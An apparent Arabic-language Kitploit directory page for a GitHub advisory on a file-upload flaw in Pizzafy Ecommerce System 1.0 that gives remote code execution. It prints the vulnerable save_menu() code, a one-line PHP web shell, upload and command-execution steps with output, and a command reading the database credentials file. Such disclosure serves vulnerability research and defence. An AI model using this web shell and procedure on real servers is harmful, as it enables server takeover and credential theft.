Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/xmyronn/cve-2026-7393-rce
توليد الحمولةتحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubxmyronn/cve-2026-7393-rce

CVE-2026-7393-RCE

عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

نظام Pizzafy للتجارة الإلكترونية 1.0 – رفع غير مقيد للملفات في دالة save_menu() يؤدي إلى تنفيذ كود عن بُعد

التفاصيل

الحقلالقيمة
البائعSourceCodester
رابط البائعhttps://www.sourcecodester.com
المنتجنظام Pizzafy للتجارة الإلكترونية باستخدام PHP وMySQL
رابط المنتجhttps://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html
الإصدار1.0
الثغرةرفع غير مقيد للملفات → تنفيذ كود عن بُعد
CWECWE-434
درجة CVSSv37.8 (عالية)
متجه الهجومالشبكة
المصادقة المطلوبةنعم (مسؤول)
تفاعل المستخدملا شيء
الباحثImad Alvi
التاريخ2026-04-12

المكوّن المتأثر

الملف: Pizzafy/admin/admin_class_novo.php → دالة save_menu()
المُعامل: img (ملف)
مسار الرفع: Pizzafy/assets/img/


الوصف

تتعامل دالة save_menu() في نظام Pizzafy للتجارة الإلكترونية 1.0 مع رفع صور عناصر القائمة دون إجراء أي تحقق من نوع الملف. يسترجع التطبيق امتداد الملف باستخدام pathinfo() لكنه لا يتحقق فعليًا من أنواع الملفات المسموحة أو يقيّدها قبل نقل الملف المرفوع إلى مجلد assets/img/ المتاح عبر الويب. يمكن لمسؤول مُصادق رفع قشرة ويب PHP متنكرة كصورة قائمة، ثم الوصول إليها مباشرة عبر المتصفح لتحقيق تنفيذ كود عن بُعد على الخادم.

الكود القابل للاستغلال في admin_class_novo.php:

root@kitploit:~
function save_menu(){
    extract($_POST);
    // ...
    if($_FILES['img']['tmp_name'] != ''){
        $fname = strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
        $move = move_uploaded_file($_FILES['img']['tmp_name'],'../assets/img/'. $fname);
        $data .= ", img_path = '$fname' ";
    }
    // No extension check, no MIME type check
}

إثبات المفهوم

الخطوة 1 — إنشاء قشرة ويب PHP

أنشئ ملفًا باسم shell_web2.php بالمحتوى التالي:

root@kitploit:~
<?php echo shell_exec($_GET['cmd']); ?>

الخطوة 2 — رفع القشرة عبر إدارة القائمة

سجّل الدخول كمسؤول وانتقل إلى:

root@kitploit:~
http://localhost/pizzafy/Pizzafy/admin/index.php?page=menu

املأ نموذج القائمة بأي قيم صالحة واختر shell_web2.php كملف الصورة. انقر حفظ.

Screenshot 2026-04-12 171202

تُدرج القشرة الآن كعنصر قائمة في الصفحة المخصصة للعملاء.

Screenshot 2026-04-12 171236

الخطوة 3 — تحديد موقع القشرة المرفوعة

انتقل إلى مجلد الأصول — تم تفعيل سرد الدليل (CWE-548):

root@kitploit:~
http://192.168.0.9/pizzafy/Pizzafy/assets/img/

تظهر قشرة PHP المرفوعة في سرد الدليل.

Screenshot 2026-04-12 171300

الخطوة 4 — تنفيذ أوامر عن بُعد

افتح القشرة المرفوعة مباشرة ومرّر أوامر النظام عبر المُعامل cmd:

root@kitploit:~
http://192.168.0.9/pizzafy/Pizzafy/assets/img/1775994120_shell_web2.php?cmd=whoami

الاستجابة — أمر نظام مُنفَّذ على الخادم:

root@kitploit:~
desktop-g1i9np3\dell
Screenshot 2026-04-12 171313

أوامر إضافية

root@kitploit:~
?cmd=whoami
?cmd=ipconfig
?cmd=dir C:\xampp\htdocs\pizzafy
?cmd=type C:\xampp\htdocs\pizzafy\Pizzafy\admin\db_connect.php

التأثير

يمكن لمسؤول مُصادق أن:

  • يرفع ملفات PHP عشوائية إلى خادم الويب
  • ينفّذ أي أمر على مستوى نظام التشغيل على الخادم
  • يقرأ ملفات حساسة بما في ذلك بيانات اعتماد قاعدة البيانات
  • ينشئ قشرة عكسية للوصول الكامل والمستمر
  • يخترق الخادم الأساسي بالكامل

ملاحظة حول سرد الدليل (CWE-548)

تم تفعيل سرد الدليل في مجلد assets/img/، مما يسمح للمستخدمين غير المصادقين بتصفح جميع الملفات المرفوعة بما في ذلك قشرة الويب. وهذا يضاعف خطورة ثغرة رفع الملفات.


المراجع

  • SourceCodester — نظام Pizzafy للتجارة الإلكترونية
  • CWE-434: رفع غير مقيد لملف بنوع خطير
  • CWE-548: كشف المعلومات عبر سرد الدليل
تنزيل الأداة